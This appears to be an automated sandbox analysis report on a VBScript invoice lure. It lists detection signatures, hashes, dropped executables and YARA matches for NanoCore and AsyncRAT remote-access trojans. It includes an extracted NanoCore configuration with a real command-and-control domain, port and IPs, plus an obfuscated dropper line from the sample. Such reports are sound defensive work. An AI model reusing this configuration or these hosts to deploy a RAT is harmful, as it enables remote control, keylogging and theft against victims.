Analysis Report Invoice No F1019855_PDF.vbs

Overview

General Information

Sample Name: Invoice No F1019855_PDF.vbs
Analysis ID: 404165
MD5: ce4dcec84bfeba49404fa70f5d137645
SHA1: c31021953c59af126d0095bea70c26ca02a2d954
SHA256: ca85b069b028fc30a2af436344eae332ad6afe8a7e3904a48ee63948ab6c3133
Tags: NanoCoreRATvbs

Detection

Nanocore AsyncRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Detected Nanocore Rat
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: NanoCore
VBScript performs obfuscated calls to suspicious functions
Yara detected AsyncRAT
Yara detected Nanocore RAT
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Contains functionality to log keystrokes (.Net Source)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Potential malicious VBS script found (has network functionality)
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Antivirus or Machine Learning detection for unpacked file
Binary contains a suspicious time stamp
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

Antivirus detection for dropped file
Source: C:\Users\user\AppData\Roaming\Notepads.exe Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Avira: detection malicious, Label: TR/Dropper.MSIL.Gen7
Source: C:\Users\user\AppData\Local\Temp\ame.exe Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Local\Temp\fi.exe Avira: detection malicious, Label: TR/Dropper.MSIL.Gen7
Found malware configuration
Source: 00000007.00000002.375251510.0000000003201000.00000004.00000001.sdmp Malware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "ac555290-50d4-4120-9390-e76e4f94", "Group": "Start Up", "Domain1": "sys2021.linkpc.net", "Domain2": "", "Port": 11940, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4ibx53ALvuTHC2wskqA=="}
Multi AV Scanner detection for dropped file
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Virustotal: Detection: 81%
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Metadefender: Detection: 90%
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe ReversingLabs: Detection: 100%
Source: C:\Users\user\AppData\Local\Temp\ame.exe Virustotal: Detection: 62%
Source: C:\Users\user\AppData\Local\Temp\ame.exe ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\fi.exe Virustotal: Detection: 81%
Source: C:\Users\user\AppData\Local\Temp\fi.exe Metadefender: Detection: 90%
Source: C:\Users\user\AppData\Local\Temp\fi.exe ReversingLabs: Detection: 100%
Source: C:\Users\user\AppData\Roaming\Notepads.exe ReversingLabs: Detection: 75%
Multi AV Scanner detection for submitted file
Source: Invoice No F1019855_PDF.vbs Virustotal: Detection: 29%
Source: Invoice No F1019855_PDF.vbs ReversingLabs: Detection: 23%
Yara detected Nanocore RAT
Source: Yara match File source: 00000001.00000003.325858053.0000016C141F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.375251510.0000000003201000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.600839165.0000000004F70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.374117540.0000000000C42000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.326079423.0000016C173D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.592804295.0000000000042000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.375293411.0000000004201000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.355766753.0000000000C42000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.330048475.0000000000042000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.599666904.000000000381A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: fi.exe PID: 6616, type: MEMORY
Source: Yara match File source: Process Memory Space: wscript.exe PID: 6428, type: MEMORY
Source: Yara match File source: Process Memory Space: dhcpmon.exe PID: 6952, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\fi.exe, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED
Source: Yara match File source: 7.2.dhcpmon.exe.424e434.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.wscript.exe.16c170d0090.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.fi.exe.4f70000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.fi.exe.382e434.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.fi.exe.38295fe.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.fi.exe.382e434.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.dhcpmon.exe.424e434.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.dhcpmon.exe.4252a5d.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.fi.exe.3832a5d.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.dhcpmon.exe.42495fe.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.fi.exe.4f70000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.fi.exe.40000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.fi.exe.4f74629.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.wscript.exe.16c170d0090.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.fi.exe.40000.0.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\Notepads.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\ame.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\fi.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 7.2.dhcpmon.exe.c40000.0.unpack Avira: Label: TR/Dropper.MSIL.Gen7
Source: 7.0.dhcpmon.exe.c40000.0.unpack Avira: Label: TR/Dropper.MSIL.Gen7
Source: 3.0.ame.exe.500000.0.unpack Avira: Label: TR/Dropper.Gen
Source: 26.0.Notepads.exe.ee0000.0.unpack Avira: Label: TR/Dropper.Gen
Source: 30.0.Notepads.exe.f40000.0.unpack Avira: Label: TR/Dropper.Gen
Source: 4.2.fi.exe.4f70000.10.unpack Avira: Label: TR/NanoCore.fadte
Source: 4.0.fi.exe.40000.0.unpack Avira: Label: TR/Dropper.MSIL.Gen7
Source: 4.2.fi.exe.40000.0.unpack Avira: Label: TR/Dropper.MSIL.Gen7
Source: C:\Users\user\AppData\Local\Temp\fi.exe File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
Source: Binary string: mscorrc.pdb source: fi.exe, 00000004.00000002.600584281.0000000004C80000.00000002.00000001.sdmp

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs:
Source: Malware configuration extractor URLs: sys2021.linkpc.net
Connects to many ports of the same IP (likely port scanning)
Source: global traffic TCP traffic: 79.137.109.121 ports 10090,0,1,4,9,11940
Potential malicious VBS script found (has network functionality)
Source: Initial file: zwLVbUFwZBZDbceUVAyKvSBZdGeuAMSuHWmohNPWzxPYjBKvHpkhxtBhvlsVpKwMjfvEpqnIkbKy.SaveToFile McuWOdLbqYeOPYiwaFEVWWSHoCSCcVdBKrzPZgVwoyASExZvjebwLKVpJnhMKIyUvcEXZTWtkIgY, JOszibYTglCXKYlUnHXtDSXmFsBPOvOQNEqqQpHaihrCgJSzpLUmlsiqrFtpZIElXmJGhvEx
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.6:49716 -> 79.137.109.121:11940
Source: global traffic TCP traffic: 192.168.2.6:49725 -> 191.96.25.26:11940
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 79.137.109.121 79.137.109.121
Source: unknown TCP traffic detected without corresponding DNS query: 191.96.25.26
Source: unknown DNS traffic detected: queries for: sys2021.linkpc.net
Source: ame.exe, 00000003.00000002.537233135.0000000002BC0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected AsyncRAT
Source: Yara match File source: 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.325883789.0000016C16535000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.547269938.0000000012956000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.329227770.0000000000502000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000000.533439085.0000000000EE2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.592748395.0000000000EE2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.575722228.0000000000F42000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.325568596.0000016C16534000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000000.540116031.0000000000F42000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.533753846.0000000000502000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ame.exe PID: 6592, type: MEMORY
Source: Yara match File source: Process Memory Space: Notepads.exe PID: 5444, type: MEMORY
Source: Yara match File source: Process Memory Space: wscript.exe PID: 6428, type: MEMORY
Source: Yara match File source: Process Memory Space: Notepads.exe PID: 2152, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Roaming\Notepads.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\ame.exe, type: DROPPED
Source: Yara match File source: 3.0.ame.exe.500000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.wscript.exe.16c1711f630.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.0.Notepads.exe.ee0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.wscript.exe.16c1711f630.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.ame.exe.129567e0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.0.Notepads.exe.f40000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.2.Notepads.exe.f40000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.2.Notepads.exe.ee0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.ame.exe.500000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.wscript.exe.16c165eefd0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.ame.exe.129567e0.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.wscript.exe.16c170d0090.5.raw.unpack, type: UNPACKEDPE
Contains functionality to log keystrokes (.Net Source)
Source: ame.exe.1.dr, Client/Handle_Packet/HandleLimeLogger.cs .Net Code: KeyboardLayout
Source: Notepads.exe.3.dr, Client/Handle_Packet/HandleLimeLogger.cs .Net Code: KeyboardLayout
Source: 3.2.ame.exe.500000.0.unpack, Client/Handle_Packet/HandleLimeLogger.cs .Net Code: KeyboardLayout
Source: 3.0.ame.exe.500000.0.unpack, Client/Handle_Packet/HandleLimeLogger.cs .Net Code: KeyboardLayout
Source: 26.0.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandleLimeLogger.cs .Net Code: KeyboardLayout
Source: 26.2.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandleLimeLogger.cs .Net Code: KeyboardLayout
Creates a DirectInput object (often for capturing keystrokes)
Source: fi.exe, 00000004.00000002.594266413.0000000000808000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Installs a raw input device (often for capturing keystrokes)
Source: fi.exe, 00000004.00000002.600839165.0000000004F70000.00000004.00000001.sdmp Binary or memory string: RegisterRawInputDevices

E-Banking Fraud:

Yara detected Nanocore RAT

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000001.00000003.325858053.0000016C141F0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000001.00000003.325858053.0000016C141F0000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000002.375251510.0000000003201000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000004.00000002.600475304.0000000004A60000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000004.00000002.600839165.0000000004F70000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000007.00000002.374117540.0000000000C42000.00000002.00020000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000007.00000002.374117540.0000000000C42000.00000002.00020000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000001.00000003.326079423.0000016C173D1000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000001.00000003.326079423.0000016C173D1000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000001.00000003.326100601.0000016C165FC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000001.00000003.326100601.0000016C165FC000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000004.00000002.592804295.0000000000042000.00000002.00020000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000004.00000002.592804295.0000000000042000.00000002.00020000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000002.375293411.0000000004201000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000000.355766753.0000000000C42000.00000002.00020000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000007.00000000.355766753.0000000000C42000.00000002.00020000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000004.00000000.330048475.0000000000042000.00000002.00020000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000004.00000000.330048475.0000000000042000.00000002.00020000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000004.00000002.599666904.000000000381A000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: fi.exe PID: 6616, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: fi.exe PID: 6616, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: wscript.exe PID: 6428, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: wscript.exe PID: 6428, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: dhcpmon.exe PID: 6952, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: dhcpmon.exe PID: 6952, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: C:\Users\user\AppData\Local\Temp\fi.exe, type: DROPPED Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: C:\Users\user\AppData\Local\Temp\fi.exe, type: DROPPED Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.2.dhcpmon.exe.424e434.4.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 1.2.wscript.exe.16c170d0090.5.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 1.2.wscript.exe.16c170d0090.5.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.2.fi.exe.4f70000.10.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.0.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.0.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.2.fi.exe.382e434.3.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.fi.exe.38295fe.4.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.fi.exe.38295fe.4.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.2.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.2.fi.exe.4a60000.6.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.fi.exe.382e434.3.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.dhcpmon.exe.424e434.4.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.dhcpmon.exe.4252a5d.2.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.fi.exe.3832a5d.5.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.dhcpmon.exe.42495fe.3.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.dhcpmon.exe.42495fe.3.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.2.fi.exe.4f70000.10.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.dhcpmon.exe.3223dc4.1.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.0.fi.exe.40000.0.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.0.fi.exe.40000.0.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.2.fi.exe.4f74629.9.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.fi.exe.27f1774.2.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 1.2.wscript.exe.16c170d0090.5.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 1.2.wscript.exe.16c170d0090.5.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.2.fi.exe.40000.0.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.fi.exe.40000.0.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\fi.exe Code function: 4_2_0234131A NtQuerySystemInformation, 4_2_0234131A
Source: C:\Users\user\AppData\Local\Temp\fi.exe Code function: 4_2_023412DF NtQuerySystemInformation, 4_2_023412DF
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\fi.exe Code function: 4_2_0004524A 4_2_0004524A
Source: C:\Users\user\AppData\Local\Temp\fi.exe Code function: 4_2_022E2FA8 4_2_022E2FA8
Source: C:\Users\user\AppData\Local\Temp\fi.exe Code function: 4_2_022E23A0 4_2_022E23A0
Source: C:\Users\user\AppData\Local\Temp\fi.exe Code function: 4_2_022E8788 4_2_022E8788
Source: C:\Users\user\AppData\Local\Temp\fi.exe Code function: 4_2_022E3850 4_2_022E3850
Source: C:\Users\user\AppData\Local\Temp\fi.exe Code function: 4_2_022EB56A 4_2_022EB56A
Source: C:\Users\user\AppData\Local\Temp\fi.exe Code function: 4_2_022E969B 4_2_022E969B
Source: C:\Users\user\AppData\Local\Temp\fi.exe Code function: 4_2_022E9388 4_2_022E9388
Source: C:\Users\user\AppData\Local\Temp\fi.exe Code function: 4_2_022E306F 4_2_022E306F
Source: C:\Users\user\AppData\Local\Temp\fi.exe Code function: 4_2_022E944F 4_2_022E944F
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Code function: 7_2_00C4524A 7_2_00C4524A
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Code function: 7_2_05433850 7_2_05433850
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Code function: 7_2_054323A0 7_2_054323A0
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Code function: 7_2_05432FA8 7_2_05432FA8
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Code function: 7_2_0543306F 7_2_0543306F
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe B9F40A82EB141D2C09E9FDF133B80DCEB4163C89471CEC7AF84DB2141C5D51A5
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\ame.exe C676638B019D810CE392CADCF8F0719F76F305D380D69BA93A6FC60A3F92E2C7
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\fi.exe B9F40A82EB141D2C09E9FDF133B80DCEB4163C89471CEC7AF84DB2141C5D51A5
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\Notepads.exe C676638B019D810CE392CADCF8F0719F76F305D380D69BA93A6FC60A3F92E2C7
Java / VBScript file with very long strings (likely obfuscated code)
Source: Invoice No F1019855_PDF.vbs Initial sample: Strings found which are bigger than 50
Yara signature match
Source: 00000001.00000003.325858053.0000016C141F0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000001.00000003.325858053.0000016C141F0000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000007.00000002.375251510.0000000003201000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000004.00000002.600475304.0000000004A60000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000004.00000002.600475304.0000000004A60000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000004.00000002.600839165.0000000004F70000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000004.00000002.600839165.0000000004F70000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000007.00000002.374117540.0000000000C42000.00000002.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000007.00000002.374117540.0000000000C42000.00000002.00020000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
